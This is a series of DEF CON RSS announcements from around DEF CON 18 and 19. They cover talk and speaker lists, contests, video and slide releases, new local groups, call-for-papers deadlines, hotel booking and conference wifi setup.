https://www.defcon.org/defconrss.xml Even though Halloween has come and gone, we have some tasty video treats for your viewing pleasure! Check out the videos from 10,000 Hacker Pyramid, Hacker Jeopardy, and the DEF CON 19 Closing Ceremonies, and you can enjoy or re-live some of the fun we had at DEF CON 19!
* 10,000 Hacker Pyramid and Hacker Jeopardy - Friday Night
* 10,000 Hacker Pyramid and Hacker Jeopardy - Saturday Night
* DEF CON 19 Closing Ceremonies

==> DEF CON 19 Video is Live!

https://www.defcon.org/defconrss.xml At long last, we would like to present the DEF CON 19 video presentations (slides w/ audio of the talk) for your viewing enjoyment! You can access them on the DEF CON 19 Archive page, or on the RSS Feed at https://www.defcon.org/podcast/defcon-19-slides.rss!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml A big welcome to the most recent additions to DEF CON Groups!
Domestic
* 402 - Omaha, NE
* 410 - Baltimore, MD
* 509.1 - Spokane, WA
* 702 - Las Vegas, NV
* 801 - Salt Lake City, UT
* 805 - Thousand Oaks, CA
International
* 003348 - Presidencia Roque Sáenz Peña, Chaco, Argentina
* 0101 - Bogotá, Colombia
* 0131 - Casale Monferrato, Italy
* 0497 - Kerala, India
* 303002 - Jaipur, India
* 6221 - Jakarta, Indonesia
* 9180 - Bangalore, Karnataka, India
* 91824 - Mangalore, Karnataka, India
* 941 - Colombo, Sri Lanka
* 9663 - Dhahran, Saudi Arabia
To find the DEF CON Group in your area check out the DCG Listing Page. If there isn't one, you can start one! Check out the DCG Point of Contact FAQ for details.

==> Download the DEF CON 19 DVD!

https://www.defcon.org/defconrss.xml We have posted the DEF CON 19 DVD content on media.defcon.org in two .iso images: one is the original DVD distributed at the show, and the other contains all the same content, but with the updated slide decks from the speakers. Download them at the following links:
https://media.defcon.org/dc-19/defcon-19-dvd-original.iso (~1.6 GB)
https://media.defcon.org/dc-19/defcon-19-dvd-updated.iso (~1.7 GB)
Enjoy!

==> Press Page updated for DEF CON 19!

https://www.defcon.org/defconrss.xml Check out the DEF CON Press Archive or the DEF CON 19 Archive page to see what the top stories of DEF CON 19 were all about! We hear we will be receiving the audio and slide video from DC19 soon, so keep your eyes on our Twitter and Facebook pages for the heads up when we get it posted!

==> Contest Results Page is Up!

https://www.defcon.org/defconrss.xml Check out the results of many of the innovative and challenging contests that occurred at DEF CON 19. If you ran a contest and would like the results posted, email them to neil [at] defcon ]dot[ org and we'll get them up!

==> New Presentation Materials RSS Feed

https://www.defcon.org/defconrss.xml Many of you know about our Archive Page; recently we uploaded all the presentation materials from DEF CON 19. The thought occurred to us: what if you want to download them all at once and in an attractive RSS? So we made one. Not all presentations have PDF enclosures, but we wanted to be complete and list every abstract and Bio we had for our speaker roster. As soon as we can encode and post the Audio and Video RSS we will; in the meantime, enjoy the DEF CON 19 Materials. Join the discussion thread on the DEF CON Forums: https://forum.defcon.org/forumdisplay.php?f=611. Don't forget to join our Facebook page www.facebook.com/defcon to get involved as well.

==> The DEF CON 19 Archive Page is up, slides posted!

https://www.defcon.org/defconrss.xml Head on over to the DEF CON 19 Archive page, where you can find the slides submitted for this year's talks! You can also download a copy of the Program guide. Keep an eye on this page for updates in the coming weeks, including press, video, audio, music and other great stuff from DEF CON 19!

==> Thanks for a Great Con!

https://www.defcon.org/defconrss.xml Well, another DEF CON has come and gone, and was it ever a great one! We'd like to give a huge shout out to all of you who attended and made it all worthwhile! Big thanks to all of the speakers, workshop instructors, contest/event & village organizers, and vendors who provide so much awesome content for this con! Not to mention the multitudes of goons who make it all run like a well-oiled machine, as well as the fantastic staff at the Rio who went above and beyond for this unknown (to them) and crazy group of 11-12 thousand hackers! We are still reeling that the first year in a new hotel ran so smoothly! We're back in the saddle now after a little much needed R&R, so you can expect the content, press, contest results, and highlights to start rolling in over the next few days and weeks. In fact, it seems like the planning crew is already psyched and bursting at the seams with great ideas for next year, our 20th anniversary! Expect it to be epic! Keep your eyes on the DEF CON RSS, Twitter and Facebook pages for the latest updates as they roll in. Also check out the DEFCON 19 and Beyond Forum on the DEF CON Forums for all of the discussions about this year's show!

==> Huge Speaker Update!

https://www.defcon.org/defconrss.xml Here are 46 more reasons to be at DEF CON 19! Read On...

==> DEF CON Workshops are Live!

https://www.defcon.org/defconrss.xml New for Def Con 19, Workshops extend the experience of learning to the classroom. Take your time and get it right by getting some hands-on time with hardware and software, and picking the minds of some of the most interesting hackers in their fields. Bring your thinking cap and get ready to be schooled. Read On...

==> The DEF CON Awards!

https://www.defcon.org/defconrss.xml New, for DEF CON 19 - the DEF CON Awards! DEF CON introduces the DEF CON Awards to recognize people/projects/companies for their competence (or lack thereof) in the hacking or security world. Nominations will be accepted for the categories below until July 6th, 2011. Voting will be conducted online for three of the categories from July 8th - July 29th, 2011 (voting link will be provided at a later time). Do you have a favorite hacker oriented author that best represents the hacker lifestyle and scene? Do you have inside knowledge of the most interesting malware to hit the net this year? Or was there a media outlet that best represents the WORST in coverage of real news concerning hackers or security topics? Now's your chance to have a voice. Get your nominations in today, and give credit where credit is due. Be sure to provide supporting information, such as links to websites, news articles, or software. Turn in your nominations here: http://www.surveymonkey.com/s/2JDHC23

==> So Many Speakers!

https://www.defcon.org/defconrss.xml Take a minute to peruse this fantastic set of additions to the DEF CON 19 line-up!
* Fingerbank — Open DHCP Fingerprints Database -- Olivier Bilodeau
* PacketFence, The Open Source Nac: What We've Done In The Last Two Years -- Olivier Bilodeau
* Kinectasploit: Metasploit Meets Kinect -- Jeff Bryner
* Metasploit vSploit Modules -- Marcus J. Carey and David Rude
* Look At What My Car Can Do -- Tyler Cohen
* VDLDS — All Your Voice Are Belong To Us -- Ganesh Devarajan and Don LeBert
* Don't Drop the SOAP: Real World Web Service Testing for Web Hackers -- Tom Eston, Josh Abraham, and Kevin Johnson
* Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing? -- Foofus
* Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies -- Kenneth Geers
* Smartfuzzing the Web: Carpe Tuorum Foramina -- Nathan Hamiel, Gregory Fleischer, Justin Engler, and Seth Law
* Economics of Password Cracking in the GPU Era -- Robert "Hackajar" Imhoff-Dousharm
* Battery Firmware Hacking -- Charlie Miller
* Big Brother on the Big Screen: Fact/Fiction? -- Nicole Ozer
* Archive Team: A Distributed Preservation of Service Attack -- Jason Scott
* Insecurity: An Analysis Of Current Commercial And Government Security Lock Designs -- Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis
* DIY Non-Destructive Entry -- Schuyler Towne
* Seven Ways to Hang Yourself with Google Android -- Jacob West and Yekaterina Tsipenyuk ONeil
* Key Impressioning -- Jos Weyers
* Phishing and Online Scam in China -- Joey Zhu
* Vanquishing Voyeurs: Secure Ways To Authenticate Insecurely -- Zoz and Andrea Bianchi

==> New Talks

https://www.defcon.org/defconrss.xml Here's another bundle of talks to whet your appetite for DEF CON Madness! More to come in the next couple days! (Read on...)

==> Talks Keep on Coming!

https://www.defcon.org/defconrss.xml Another batch of fine DEF CON content has been added to the mix! Check out the newest additions to our line-up!
* The Art and Science of Security Research -- Greg Conti
* Internet Kiosk Terminals: The Redux -- Paul Craig
* Introduction to Tamper Evident Devices -- datagram
* Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests -- Rob Havelt and Wendel Guglielmetti Henrique
* Sounds Like Botnet -- Itzik Kotler and Iftach Ian Amit
* Panel: Is it 0-day or 0-care? -- Jake Kouns, Brian Martin, Steve Christey, Carsten Eiram, Art Manion, Dan Holden, Alex Hutton and Katie Moussouris
* Vulnerabilities of Wireless Water Meter Networks -- John McNabb
* Blinkie Lights: Network Monitoring with Arduino -- Steve Ocepek
* My password is: #FullOfFail! — The Core Problem with Authentication and How We Can Overcome It -- Jason M. Pittman
* Mobile App Moolah: Profit taking with Mobile Malware -- Jimmy Shah
* Weaponizing Cyberpsychology and Subverting Cybervetting for Fun, Profit and Subterfuge -- Chris "TheSuggmeister" Sumner and alien
* Staring into the Abyss: The Dark Side of Crime-fighting, Security, and Professional Intelligence -- Richard Thieme

==> DC19 CTF Quals Update!

https://www.defcon.org/defconrss.xml Another DEF CON CTF Qualification round has passed, and with it 12 teams will ascend to their slots in the DEF CON 19 Capture the Flag Competition. The qualifying teams have not been posted just yet, so keep an eye on ddtek.biz for the winners, and we'll announce them as well when we have the results. For now, we have collected as many write-ups as we could find from this year's Quals for your consumption! (Read on...)

==> More Speakers Posted!

https://www.defcon.org/defconrss.xml Another poppin' fresh batch of speakers is now live on the speaker page. Here's a handy list of the new offerings!
* Bosses love Excel, Hackers too. -- Chema Alonso and Juan Garrido "Silverhack"
* Three Generations of DoS Attacks (with Audience Participation, as Victims) -- Sam Bowne
* Familiarity Breeds Contempt -- Sandy "Mouse" Clark and Brad "RenderMan" Haines
* Cipherspaces/Darknets: An Overview Of Attack Strategies -- Adrian Crenshaw "Irongeek"
* Speaking with Cryptographic Oracles -- Daniel Crowley
* Smile for the Grenade! "Camera Go Bang!" -- Vlad Gostom and Joshua Marpet
* Assessing Civilian Willingness to Participate in On-Line Political and Social Conflict -- Thomas J. Holt and Max Kilger
* Hacking and Securing DB2 LUW Databases -- Alexander Kornbrust
* PIG: Finding Truffles Without Leaving A Trace -- Ryan Linn
* Hacking .Net Applications: The Black Arts -- Jon McCoy
* Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes -- Deviant Ollam
* Port Scanning Without Sending Packets -- Gregory David Pickett

==> CTF Qualification Round Begins Tomorrow!

https://www.defcon.org/defconrss.xml You only have a few scant hours left (00:00:00 UTC) to register for the DEF CON 19 CTF Quals, which begin tomorrow at 19:00:00 UTC. This is the event that separates the hackers from the kiddies, to send the top 12 teams to battle for the glory that comes with winning a DEF CON Capture the Flag Competition. Register and get all the info at http://ddtek.biz!

==> New Contests and Events!

https://www.defcon.org/defconrss.xml Check out a few of the new contests and events coming to DEF CON 19!
* DEF CON Beard & Moustache Championships: Due to the growing number of awesome beards at DEFCON and the (popularity?) of the shitshow that is beardsmanship, it's time that folks were recognized for letting their unix beards fly.
* DEF CON Radio: Defcon Radio will be streaming live radio action 24/7 during the con. Speaker interviews, news, party coverage... correspondents will crawl the trenches of con to bring you entertainment. Are you not entertained?
* DEF CON Bike: Rent bicycles, hire a guide, and endure a 2 hour bike ride in the Las Vegas heat! Got Water?
* Forensics Contest: The Network Forensics Puzzle Contest is a challenging mystery requiring contestants to forensically analyze packet captures (and more!) to uncover an evil plot.

==> DEF CON 19 Artwork Contest and Short Story Contest is Open!

https://www.defcon.org/defconrss.xml The DEF CON Artwork Contest is again underway! This year's theme is reminiscent of those 60's and 70's spy movies and TV shows like "The Man from U.N.C.L.E", "Our Man Flint", and "James Bond", with a hacker angle and a little grit. We have dubbed this theme "Haxploitation". (Read on...) For the writers, the DEF CON 19 Short Story contest is also open, and similarly themed. Find out about it at https://forum.defcon.org/showthread.php?t=12153

==> Time Grows Short.

https://www.defcon.org/defconrss.xml Hola friends! This is just a reminder that deadlines are looming. The Call for Papers ends May 27th, so if you're planning to submit a talk you have just over a week to put that proposal together! Find the CFP Announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html, and the Call for Papers form at https://www.defcon.org/html/defcon-19/dc-19-cfp-form.html. Also looming is the deadline for the DEF CON 19 Contest/Event RFI. June 1st is when you need to have your proposal for the latest great or time tested contest or event submitted to Pyr0. You can find the RFI at https://forum.defcon.org/showthread.php?t=12113. Good luck and remember: DEF CON is what you make it.

==> New DEF CON 19 Site, Speakers Up.

https://www.defcon.org/defconrss.xml Check out the spankin' new site for DEF CON 19! Have a look around, see what's new, and while you're at it, check out the first batch of Speakers!
* Deceptive Hacking: How Misdirection Can Be Used to Steal Information Without Being Detected -- Bruce "Grymoire" Barnett
* Abusing HTML5 -- Ming Chow
* Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing) -- Dr. Patrick Engebretson and Dr. Josh Pauli
* Getting F*cked On the River -- Gus Fritschie and Mike Wright
* Jugaad – Linux Thread Injection Kit -- Aseem "@" Jakhar
* Black Ops of TCP/IP 2011 -- Dan Kaminsky
* Hacking Your Victims Over Power Lines -- Dave Kennedy (ReL1K)
* DCFluX in: License to Transmit -- Matt Krick "DCFluX"
* Balancing The Pwn Trade Deficit – APT Secrets in Asia -- Anthony Lai, Jeremy Chiu and PK
* Covert Post-Exploitation Forensics With Metasploit -- Wesley McGrew
* VoIP Hopping the Hotel: Attacking the Crown Jewels through VoIP -- Jason Ostrom
* Getting SSLizzard -- Nicholas J. Percoco and Paul Kehrer
* This is REALLY not the droid you're looking for... -- Nicholas J. Percoco and Sean Schulte
* WTF Happened to the Constitution?! The Right to Privacy in the Digital Age -- Michael "theprez98" Schearer
* Runtime Process Insemination -- Shawn Webb
* Staying Connected during a Revolution or Disaster -- Thomas Wilhelm
* Network Application Firewalls vs. Contemporary Threats -- Brad Woodberg
As always, stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> DEF CON 19 Contest/Event RFI is Live!

https://www.defcon.org/defconrss.xml PyrØ has posted the DEF CON 19 Contest & Event Request for Information on the DEF CON Forums. If you have, or are currently thinking about running, a contest or an event at DEF CON, this is the info you need to be considered for space, power and network connectivity! Submit your contest data by filling out the form at the bottom. Here's a big shout out to Deviant Ollam for being on top of things and being the first to submit an RFI for the Beverage Cooling Contraption Contest!

==> DEF CON 19 Call for Music!

https://www.defcon.org/defconrss.xml Are you a Band or a DJ who wants to perform at DEF CON 19? Then answer the Call for Music freshly posted by DJ Great Scott! You can check out the write-up at https://forum.defcon.org/showthread.php?p=119223 as well as download the application! Hurry up and apply, as the Deadline is Sunday May 15! Good luck!

==> DEF CON 19 Call for Workshops!

https://www.defcon.org/defconrss.xml Are you a leader, 'leet hacker, a ninja in your field? Do you have a passion to teach and share your knowledge? Got something interesting you are dying to talk about? We're looking for workshops from people like you. If you are interested in being part of the very first ever DEF CON Workshop team, submit now! (Read on...)

==> DEF CON 19 News! Pool Hijinks, CTF Quals, and Evidence Tampering

https://www.defcon.org/defconrss.xml Here's what's going on in the world of DEF CON: The Pool Is Open! Bring your suits and stow your tech, because poolside shenanigans in the wee hours are coming back to DEF CON! This year we will have 24hr pool access to Pool 4 (pictured) at the Rio! We're not even April foolin! DDTek Announces CTF Quals! It's that time again, and your first step to joining the ranks of leetness that can only come from a win in the DEF CON Capture The Flag. That's right, DDTek has announced the qualification round for the 2011 DEF CON CTF! Tamper Evident Returns! DT's Tamper Evident Contest is coming back this year with some new surprises. It might be time to brush up on your super sneaky methods for opening things you aren't supposed to, and keep your eye on the Tamper Evident Forum for details as they surface. Stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Feast your eyes on a new Speaker's Corner by Jack Daniel, which gives you some great tips if you are thinking about submitting a talk for DEF CON!

==> DEF CON 18 Video+Slides returns!

https://www.defcon.org/defconrss.xml We have re-loaded the original videos we posted from DEF CON 18 featuring video of the speaker and video of the slides! Check out the Video RSS Feed or on iTunes and enjoy!

==> The DEF CON 19 Call for Papers is Now Open!

https://www.defcon.org/defconrss.xml More exciting than HBGary's email, the world's #1 hacker exposé or a 5up3r $3kret.gov leak, it is time for the DEF CON Call for Papers to open! What: DEF CON 19 Call For Papers. When: The Call for Papers will close on May 27th, 2011. How: Complete the Call for Papers Form and send to talks at defcon dot org. DEF CON will take place at the Rio in Las Vegas, NV, USA, August 4 - August 7th, 2011. Read the full announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html

==> Contests and Events we'll see at DEF CON 19!

https://www.defcon.org/defconrss.xml Below you'll find a list of some of the fantastic contests and events that have announced intent to return for DEF CON 19! This is not by any means a complete list, and will be growing as planning continues.
* Artwork Contest(s): No Posts
* Be The Match Foundation - Bone Marrow Drive: Forum Active
* Beverage Cooling Contraption Contest: No Posts
* CTP: Capture the Packet: No Posts
* Crack Me If You Can: Forum Active
* Dark Tangent's Tamper Evident Contest: Forum Active
* DC101: Forum Active
* DEF CON Geo Challenge: No Posts
* DEF CON Shoot: Forum Active
* DEF CON Social Engineering CTF: No Posts
* Goon Band -- Recognize: No Posts
* Hacker Karaoke: No Posts
* Ham license exams: No Posts
* Lockpicking Contests: No Posts
* Open CTF: No Posts
* Scavenger Hunt: No Posts
* The Summit EFF Fundraiser: No Posts
* Toxic BBQ: No Posts
* Wall of Sheep: No Posts
In case you didn't know, most of these contests and events started unofficially, with a great idea and some devotion, by attendees who just wanted to do something cool. Yes friend, that means you could be creating the next big DEF CON contest or event! Post your vision to the New Ideas section of the DEF CON Forums, and see what kind of response you get!

==> Rio Registration is Live for DEF CON 19!

https://www.defcon.org/defconrss.xml Here's something for all of you early birds! The DEF CON 19 group room registration at the Rio is now live! The room rates are $99 Sunday thru Thursday and $112 per night on Friday and Saturday. The group rates are valid Monday August 1 to Friday August 12. You may either follow this link: http://www.harrahs.com/CheckGroupAvailability.do?propCode=RLV&groupCode=SRDEF11 Or call the Rio toll free at 1-888-746-6955 and refer to group code: SRDEF11

==> DEF CON Groups News

https://www.defcon.org/defconrss.xml Happy 2011 from DEF CON! DEF CON Groups is undergoing some administrative changes heading into the new year, and we'd like to let you know that long time Goon and friend of DEF CON, Converge, has graciously stepped up to take the reins as DEF CON Groups Coordinator! If you currently run a DCG and want to update your info on the site, or if you are interested in starting a new DCG, you can contact him at dcgroups at defcon dot org. We'd like to extend a big welcome to the following new groups!
* DC334.1 Montgomery, AL
* DC808.2 Ewa Beach, HI
* DC9723 Tel-Aviv, Israel
* DC1020 Eckental, Germany
* DC281 Houston, TX
Keep an eye open for more from the DEF CON Groups in 2011!

==> Stop. Think. Connect. A Special DHS, PSA Contest

https://www.defcon.org/defconrss.xml Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator, has issued a special PSA Contest. This crowd sourcing campaign is in an effort to alert the general public to Stop, Think, then Connect, when it comes to their online presence and responsibility. Good, bad, or otherwise, I would really like to see what the DEF CON community comes up with. I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest; I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensue in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSAs since I was a kid. A lot of us remember and have a special place in our hearts for the PSAs of our youth, especially ones of the "The More you Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle". From the contest: "Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect."
For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm PSAs must include at least one of the following Internet safety tips:
* Keep a Clean Machine
* Protect Your Personal Information
* Connect with Care
* Be Web Wise
* Be A Good Online Citizen
In similar fashion, I'd love to see if anyone out there posts something on:
* Understanding Encryption
* Surfing Anonymously
* Using Proxy Servers or Feed Over Email
* Understanding Copyright, TOS agreements, and Privacy expectations.
* Who and What is a Troll and how to defeat them.
This past year we had a few talks from both the offense and defense perspectives; check them out on the DC 18 archive. There are too many that fit this topic to list; you might find something that inspires you. I hope you guys & gals out there send in a submission; if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect". The contest runs until Feb 14th, Valentine's Day, so send in your love, send us links, let's get this PSA party started. Good luck! Nikita @niki7a on twitter. Nikita@Defcon.org

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Jack Daniel discusses PCI and the hacker community in a new Speaker's Corner entitled "How Did We End Up Like This?"

==> Video is Back!

https://www.defcon.org/defconrss.xml Video is back up and running! These versions differ from the ones we removed, they are video of the slides only with audio of the talk. You can find them on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> Hacker Jeopardy Slides + Audio

https://www.defcon.org/defconrss.xml Here's a tasty morsel for you, slide video with audio of this year's Hacker Jeopardy! We don't often see this, so if you're interested in playing next year or just want to get an idea of what it's about, this is a great resource!
* DEF CON 18 Hacker Jeopardy - Friday Part 1
* DEF CON 18 Hacker Jeopardy - Friday Part 2
* DEF CON 18 Hacker Jeopardy - Saturday Part 1
* DEF CON 18 Hacker Jeopardy - Saturday Part 2

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by the Suggmeister, the follow-up to his "Experiences of a First Time DEF CON Speaker" article before DEF CON 18!

==> Video Update

https://www.defcon.org/defconrss.xml The videos have been taken down for a week or two, as we worked a little too fast to get them up and the production company wasn't ready to release them. We will have slides+audio versions of the videos up and online within the next two weeks, once we receive the right versions and process. Thanks for your patience, and stay tuned to our Twitter, RSS Feed, or Facebook page for the announcement when they go back up!

==> DEF CON 18 Talks - Video is Live!

https://www.defcon.org/defconrss.xml The DEF CON 18 talks with the speaker video and slides have been processed and posted! Check 'em out on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> DEF CON 18 Talks - Audio is Live!

https://www.defcon.org/defconrss.xml That is correct folks! You can now listen to all of the awesome DEF CON 18 Talks in .m4b Audiobook format! You can find them on the Audio RSS Feed or on the DEF CON 18 Archive Page! Video is on the way, look for it soon! You can know about it the minute it goes live by keeping up with the DEF CON Facebook page or @_defcon_ on Twitter!

==> DEF CON 18 Tools Page Updated!

https://www.defcon.org/defconrss.xml Swing by the Tools Released page and have a look at all the tools released at DEF CON 18! There are local copies, if available, for your convenience, and links to the project homepages as well!

==> DEF CON 18 Music is posted!

https://www.defcon.org/defconrss.xml That's right, you can now download the sets from The Cyberpunk Gala and the poolside action at https://www.defcon.org/podcast/defcon-18-music.rss! The Zombie Ball is having some technical difficulties but should be up soon as well! We will also have video of the music sets soon as well, so keep an eye peeled.

==> DC18 Contest Results and New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the DEF CON 18 Contest results page for the results of the contests we have received so far! If you ran a contest and have results for us, send them in! We also have a new Speaker's Corner from Schuyler Towne, discussing his secret agenda for locksport! Music sets from the pools and the bleep at DEF CON 18 are being processed, look for it to be posted next week!

==> More DEF CON 18 Press!

https://www.defcon.org/defconrss.xml We've updated the press page with even more DEF CON 18 coverage! Most of the new stuff can be found in the "Other" Category, and in a new category called "Video Coverage" which contains recaps, badge hacks, goon hijinks and more! Check them out on the Press Page, or the DEF CON 18 Archive Page!

==> DEF CON 18 Press And Early Video!

https://www.defcon.org/defconrss.xml Hey everyone! The Press Page and the DC 18 Archive Page have been updated with a ton of stories covering DEF CON 18! Not only that, but we have uploaded the first early release video (slides w/ audio) of a few of the talks, including:
* DEFCON 18 Hacking Conference Presentation By Joe Grand and Dark Tangent - Welcome And Behind The Scenes Of The DEFCON Badge - Slides.m4v
* DEFCON 18 Hacking Conference Presentation By Barnaby Jack - Jackpotting Automated Teller Machines Redux - Slides.m4v
* DEFCON 18 Hacking Conference Presentation By David Maynor and Paul Judge - Searching For Malware - Slides.m4v
* DEFCON 18 Hacking Conference Presentation By Chris Paget - Practical Cellphone Spying - Slides.m4v
* DEFCON 18 Hacking Conference Presentation By Md Sohail Ahmad - WPA Too! - Slides.m4v
Enjoy! The rest of the audio and video will be up in a couple of months, but for now, enjoy these tasty nuggets of DEF CON goodness!

==> DEF CON 18 Archive Page is Live!

https://www.defcon.org/defconrss.xml The DEF CON 18 Archive Page is up and running! Currently, we have all of the presentation slides, white papers and extras posted, as well as the DEF CON 18 Program in pdf format! Coming in the next week or so we'll have contest results, press, and even a few early release videos! So check it out and begin reliving the glory that was DEF CON 18!

==> DEF CON 18 Post Con Update

https://www.defcon.org/defconrss.xml DEF CON 18 was a resounding success! With more contests, events, attendance and talks, this year's show was a fitting end to our years at the Riviera! We'd like to thank the Riv for working with and hosting us for 5 awesome years! We'd also like to thank all the folks who sacrificed time, effort, and resources to contribute to the hacking community, as well as a huge thank you to all the attendees for showing up and learning, growing and participating in all this con has to offer! We've all had a chance to wind down and decompress from all the excitement of DEF CON 18, and all of the results, press, photos, updated materials and other content is rolling in. Starting in the next couple of days and through the next few weeks, we'll be posting all of this info for everyone to enjoy, reflect upon, and learn from. Keep your eyes on defcon.org, the DEF CON RSS feed, our Twitter and Facebook for all the latest updates from the show!

==> PhD Dissertation Study in the Contest Area

https://www.defcon.org/defconrss.xml Take a short survey at the table next to the Info booth in the Contest Area to participate! Here's more info: The US electricity infrastructure relies on Industrial Control Systems (ICS) for better efficiency and reliability. However, these systems are susceptible to cyberattacks, which may disrupt essential power services. How cybercriminals rationalize target selection and attack technique is vital in offering a more comprehensive picture of ICS vulnerabilities, cybercrimes, and security. This Rutgers School of Criminal Justice PhD dissertation research project will survey both ethical hackers and industry representatives. It will assess their views on cybervulnerabilities of the electricity sector's ICS to identify any gaps in their perceptions.

==> New Speakers Corner!

https://www.defcon.org/defconrss.xml Craig Heffner discusses hacking millions of routers and his upcoming talk tomorrow in a new Speaker's Corner!

==> Be the Match at DEF CON

https://www.defcon.org/defconrss.xml Be The Match offers the unique opportunity for you to give a life-saving marrow transplant to someone in need. Thousands of patients with leukemia and other life-threatening diseases depend on the Be The Match Registry, the largest and most diverse registry in the world, to find a life-saving donor. The more potential donors that step forward, the more resources are available to patients and the more lives can be saved. Description of the donor recruitment drive: Be The Match will have a booth at DefCon 18 where individuals can register to be part of the Be The Match Registry. All they need to be is between the ages of 18 and 60, meet the health guidelines and be willing to donate to ANY patient in need. At the recruitment drive, you will fill out a consent form with contact information and a short medical evaluation. You will receive more information about what it means to be a donor and then you will swab the inside of your cheeks. Your tissue type will be listed in the Be The Match Registry until your 61st Birthday. If you are a match for someone in need, then you will be contacted for donation.

==> DEF CON 18 Secure Wifi

https://www.defcon.org/defconrss.xml This year we are offering 802.1x/WPA-encrypted wireless access for Internet access. In order to access the "DefCon-Secure" wireless network, you will need to create login information for yourself. We have set up a self-registration website: https://wifireg.defcon.org Go to this site to register a username & password. You can hit it from your phone, WWAN, or the open DefCon wireless. We have also included a copy of the SecureTrust CA root certificate in case your device does not have it in its default certificate trust chain (many systems do, some do not).
SSID: DefCon-Secure or DefCon-SecureA for 5.0GHz devices (iPad, newer Macbooks)
Network Authentication: WPA2
Data encryption: TKIP or AES
Authentication EAP Type: PEAP
Authentication Mechanism: EAP-MSCHAP v2

==> More New Speaker's Corner!

https://www.defcon.org/defconrss.xml The Suggmeister provides some insight into the genesis of a talk as a new speaker in this new Speaker's Corner!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Matt Ryanczak Talks about IPv6 and the future in this all new Speaker's Corner!

==> Another New Speaker's Corner

https://www.defcon.org/defconrss.xml Tips for getting the most out of your DEF CON experience are discussed in this Speaker's Corner by Nicholas Percoco entitled "Packing It All In"!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Lockpick shapes are de-mystified in this part one of a new Speaker's Corner by Schuyler Towne entitled "What's This Lockpick For?"!

==> The Heat is On!

https://www.defcon.org/defconrss.xml There's a ton happening leading up to DEF CON 18 in just twelve more days! The Mystery Challenge is heating up! Check out the Mystery Challenge forum for the latest hijinks! We have some bad news: unfortunately the Geo Challenge will not be happening this year. You can read more about this on the Geo Challenge forum. Our sympathy goes out to the organizers for what promised to be a great contest. Definitely look for it next year! There are some exciting new offerings that have surfaced recently! Among them are:
* Dark Tangent is busting out the Tamper Evident Contest, in which you debunk the phrase "Impossible to reseal or re-use", and document how you did it!
* The Backdoor Hiding Contest, in which you test your skills at hiding and finding backdoors.
* Capture the Packet is a cool new network scavenger hunt. Look for clues, solve puzzles and win prizes!
* Crack Me If You Can: 53,000 password hashes, 48 hours, nuff said!
* PCB PWNage is a mini contest from the Hardware Hacking Village to find out who can design the coolest PCB!
* The Twitter Hunt: Follow @TheSuggmeister and watch for the clues that lead to prizes!
For all the latest info on contests and events at this year's DEF CON, check out the DEF CON Forums!

==> DEF CON 18 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the Winners of the DEF CON 18 Artwork Contest! We had a bunch of great entries this year, but we could only pick a few! First Place and the People's Choice vote win goes to "18 & Legal" by Mar! Second place goes to "DEF CON Boy" by oshu! Third goes to "Her" by emtag! Congrats to all the winners and a big thanks to all who entered! To view and download all the wallpapers from this year's contest go to the DEF CON 18 Artwork Contest Public Gallery!

==> Artist pages are live!

https://www.defcon.org/defconrss.xml You can now view all the bios and samples from the killer line-up of artists performing at DEF CON this year! Check them out on the Entertainment page.

==> DEF CON 18 Speaking Schedule is Live!

https://www.defcon.org/defconrss.xml Do we need to say much more than that? Check out the DEF CON 18 Speaking Schedule.

==> The DC 18 Speaker List Is Still Growing!

https://www.defcon.org/defconrss.xml Here's another twenty-four hot-n-fresh new DEF CON talks. Feast.
* Katana: Portable Multi-Boot Security Suite -- JP Dunning
* Exploitable Assumptions Workshop -- Joe "Crazy" Foley, Eric "Unlocked" Schmiedl, Zoz
* The Law of Laptop Search and Seizure -- Jennifer Granick, Kevin Bankston, Marcia Hofmann, Kurt Opsahl
* Advanced Format String Attacks -- Paul Haas
* Tales from the Crypto -- G. Mark Hardy
* Decoding reCAPTCHA -- Chad Houck
* 0box Analyzer: AfterDark Runtime Forensics for Automated Malware Analysis and Clustering -- Wayne Huang, Jeremy Chiu
* Hardware Hacking for Software Guys -- Dave King
* These Aren't the Permissions You're Looking For -- Anthony Lineberry, Tim Wyatt, David Richardson, Sr.
* Multiplayer Metasploit: Tag-Team Penetration and Information Gathering -- Ryan Linn
